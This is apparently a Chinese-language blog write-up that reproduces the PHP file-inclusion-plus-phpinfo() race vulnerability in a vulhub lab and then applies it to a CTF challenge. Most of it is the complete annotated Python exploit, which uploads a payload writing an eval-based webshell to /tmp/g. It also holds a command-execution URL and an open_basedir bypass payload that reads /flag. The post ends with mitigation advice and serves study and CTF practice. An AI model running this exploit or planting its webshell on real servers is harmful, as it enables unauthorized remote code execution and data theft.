注:本地測試php檔案包含+phpinfo洩露導致getshell,此漏洞與php版本無關
使用vulhub環境進行復現:
專案地址:https://github.com/vulhub/vulhub/tree/master/php/inclusion
phpinfo路徑:http://127.0.0.1:8080/phpinfo.php 檔案包含路徑:http://127.0.0.1:8080/lfi.php
docker-compose up -d 開啟環境後直接使用exp進行執行即可
此時已經成功在/tmp/g中寫入永久的shell,然後利用檔案包含進行getshell
http://127.0.0.1:8080/lfi.php?file=/tmp/g&1=system(%22id%22);
此時測試完成,簡單對exp進行一個分析,便於進一步瞭解漏洞的利用詳情
首先確定python的執行環境為python2.x,分析下各個函式的作用:
從main函式開始看:
def main(): print "LFI With PHPInfo()" print "-=" * 30 if len(sys.argv) < 2: print "Usage: %s host [port] [threads]" % sys.argv[0] sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) except socket.error, e: print "Error with hostname %s: %s" % (sys.argv[1], e) sys.exit(1) port=80 try: port = int(sys.argv[2]) except IndexError: pass except ValueError, e: print "Error with port %d: %s" % (sys.argv[2], e) sys.exit(1) poolsz=10 try: poolsz = int(sys.argv[3]) except IndexError: pass except ValueError, e: print "Error with poolsz %d: %s" % (sys.argv[3], e) sys.exit(1) print "Getting initial offset...", reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() maxattempts = 1000 e = threading.Event() l = threading.Lock() print "Spawning worker pool (%d)..." % poolsz sys.stdout.flush() tp = [] for i in range(0,poolsz): tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) for t in tp: t.start() try: while not e.wait(1): if e.is_set(): break with l: sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) sys.stdout.flush() if counter >= maxattempts: break print if e.is_set(): print "Woot! \m/" else: print ":(" except KeyboardInterrupt: print "\nTelling threads to shutdown..." e.set() print "Shuttin' down..." for t in tp: t.join()
main函式主要獲取目標ip地址和埠號以便於建立socket連線,以及獲取上傳webshell的初始化請求資料包和檔案包含的請求資料包,以及獲得臨時檔名的偏移值,main函式裡定義了maxattempts,最大嘗試次數,以及多執行緒事件e和多執行緒鎖l便於對counter進行控制
這裡簡單學習了一下event的用法:
通過threading.Event()可以建立一個事件管理標誌,Event物件用於執行緒間通訊。它提供了一組、拆除、等待用於執行緒間通訊的其他方法。該標誌(event)預設為False,event物件主要有四種方法可以呼叫:
event.wait(timeout=None):呼叫該方法的執行緒會被阻塞,如果設定了timeout引數,超時後,執行緒會停止阻塞繼續執行;
event.set():將event的標誌設定為True,呼叫set方法的所有執行緒將被喚醒;
event.clear():將event的標誌設定為False,呼叫wait方法的所有執行緒將被阻塞;
event.isSet():判斷event的標誌是否為True。
所以可以知道多執行緒之間通過event中建立的時間管理標誌來實現互相通訊
程式碼中還使用到了Lock
#建立鎖
mutex = threading.Lock()
#鎖定
mutex.acquire([timeout])
#釋放
mutex.release()
在多執行緒中使用lock可以讓多個執行緒在共享資源的時候不會“亂”
當多執行緒中需要“獨佔資源”的時候,要使用鎖來控制,防止多個執行緒同時佔用資源而出現其他異常。
使用鎖的時候就呼叫acquire()方法,以此告訴其他執行緒,我正在佔用該資源,你們要等會;待使用資源後需要釋放資源的時候就呼叫release()方法,告訴其他執行緒,我已經完成使用該資源了,其他人可以過來使用了。
然後程式碼再講初始化好的變數傳入執行緒類中,開始呼叫
最後還用到了join函式
join所完成的工作就是執行緒同步,即主執行緒任務結束之後,進入阻塞狀態,一直等待其他的子執行緒執行結束之後,主執行緒再終止
所以整個exp的設計思想是:
主執行緒初始化所有攻擊執行緒,攻擊執行緒中執行具體的payload,需要上傳webshell資料包給phpinfo,以及嘗試包含快取檔案,執行緒之間通過event事件進行通訊,一旦攻擊執行緒攻擊成功,即如果成功寫入
/tmp/g,則通過執行set()函式將執行緒管理標誌置為true,此時所有縣城將通過執行is_set()函式判斷true,此時執行緒退出,攻擊結束。
貼一段自己理解註釋以後的程式碼:
#coding:utf-8 #python2.x import sys import threading import socket """-------------構造webshell請求包-------------------""" def setup(host, port): #webshell內容,在/tmp/g下寫入shell,payload可以根據實際情況進行修改 TAG="Security Test" PAYLOAD="""%s\r <?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG REQ1_DATA="""-----------------------------7dbff1ded0714\r Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r Content-Type: text/plain\r \r %s -----------------------------7dbff1ded0714--\r""" % PAYLOAD padding="A" * 5000 #構造http請求頭,在這裡調整phpinfo的位置 REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r HTTP_ACCEPT: """ + padding + """\r HTTP_USER_AGENT: """+padding+"""\r HTTP_ACCEPT_LANGUAGE: """+padding+"""\r HTTP_PRAGMA: """+padding+"""\r Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r Content-Length: %s\r Host: %s\r \r %s""" %(len(REQ1_DATA),host,REQ1_DATA) #可以存在檔案包含的路徑 #測試檔案包含,具體路徑可以根據實際情況進行修改 LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r User-Agent: Mozilla/4.0\r Proxy-Connection: Keep-Alive\r Host: %s\r \r \r """ return (REQ1, TAG, LFIREQ) def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s2.connect((host, port)) s.send(phpinforeq) d = "" while len(d) < offset: d += s.recv(offset) try: #在這裡找到真正的快取檔案的名字,一共14位 i = d.index("[tmp_name] => ") fn = d[i+17:i+31] #print fn except ValueError: return None #嘗試利用檔案包含漏洞寫入/tmp/g s2.send(lfireq % (fn, host)) d = s2.recv(4096) s.close() s2.close() #測試是否存在Security Test標誌 if d.find(tag) != -1: return fn counter=0 class ThreadWorker(threading.Thread): def __init__(self, e, l, m, *args): threading.Thread.__init__(self) self.event = e self.lock = l self.maxattempts = m self.args = args def run(self): global counter while not self.event.is_set(): #如果沒有執行緒成功寫入/tmp/g則迴圈嘗試寫入,醉倒嘗試次數為maxattempts #因為要操作共享變數counter,所以需要先獲得鎖 with self.lock: if counter >= self.maxattempts: return counter+=1 try: x = phpInfoLFI(*self.args) #實際的payload執行,先傳送websshell上傳資料包給phpinfo,然後再檔案包含寫入永久shell if self.event.is_set(): #判斷是否有其他執行緒已經寫入/tmp/g,如果存在迴圈終止,執行緒結束 break if x: #如果存在標籤 print "\nGot it! Shell created in /tmp/g" self.event.set() #此時已經寫入/tmp/g,通過set()方法將event標誌置為1,便於通知其他執行緒通過判斷is_set()來結束執行緒執行 except socket.error: return def getOffset(host, port, phpinforeq): #得到快取檔名在輸出流中的位置,便於提取完整檔名 """Gets offset of tmp_name in the php output""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(phpinforeq) d = "" while True: i = s.recv(4096) d+=i if i == "": break # detect the final chunk if i.endswith("0\r\n\r\n"): break s.close() i = d.find("[tmp_name] => ") if i == -1: raise ValueError("No php tmp_name in phpinfo output") print "found %s at %i" % (d[i:i+10],i) # padded up a bit return i+256 def main(): print "LFI With PHPInfo()" print "-=" * 30 if len(sys.argv) < 2: print "Usage: %s host [port] [threads]" % sys.argv[0] sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) #得到目標ip地址 except socket.error, e: print "Error with hostname %s: %s" % (sys.argv[1], e) sys.exit(1) port=80 try: port = int(sys.argv[2]) #得到埠號 except IndexError: pass except ValueError, e: print "Error with port %d: %s" % (sys.argv[2], e) sys.exit(1) poolsz=10 try: poolsz = int(sys.argv[3]) except IndexError: pass except ValueError, e: print "Error with poolsz %d: %s" % (sys.argv[3], e) sys.exit(1) print "Getting initial offset...", reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() maxattempts = 1000 e = threading.Event() l = threading.Lock() print "Spawning worker pool (%d)..." % poolsz sys.stdout.flush() tp = [] for i in range(0,poolsz): tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) for t in tp: t.start() try: #主執行緒也會判斷是否成功寫入/tmp/g while not e.wait(1): if e.is_set(): break with l: sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) sys.stdout.flush() if counter >= maxattempts: break print if e.is_set(): print "Woot! \m/" else: print ":(" except KeyboardInterrupt: print "\nTelling threads to shutdown..." e.set() print "Shuttin' down..." for t in tp: t.join() if __name__=="__main__": main()
上次在國賽中也遇到了類似的題目,不過題目在檔案包含上稍微做了一些限制,以及有禁用函式
檔案包含程式碼如下:
<?php error_reporting(0); $file=$_GET["file"]; highlight_file(__FILE__); if(!is_array($file)){ if (strpos(file_get_contents($file), "We1come_To_C1sCn")!==false){ include($file); }else{ echo "Give up!"; } }else{ die("Give up Hacker!"); } ?>
直接接收file引數,並且讀取file的內容判斷其中是否存在We1come_To_C1sCn,如果存在則把檔案中的file檔案中的程式碼包含進來,題目中存在open_basedir和disable_function限制了能訪問的檔案的路徑只能在當前目錄以及禁用的函式,而flag檔案在/目錄下面
繞過方法有:
1.ini_set("open_basedir","..");+chdir("..")輕鬆繞過,具體分析見https://xz.aliyun.com/t/4720
另一種常見繞過方法,執行執行系統命令system,不受open_basedir的限制
在本地構造test.txt為
<?php echo "c1sec2333"; chdir("tips"); ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/flag')); //We1come_To_C1sCn ?>
利用之前的exp進行修改即可得到flag
修復方法:
1.刪除掉phpinfo
2.使用白名單,通過switch,判斷要包含的檔名在不在合法的可包含檔名之中
3.過濾..
if (str_replace("..", '', $tmpname) !== $tmpname)
這樣就不能再路徑中使用目錄穿越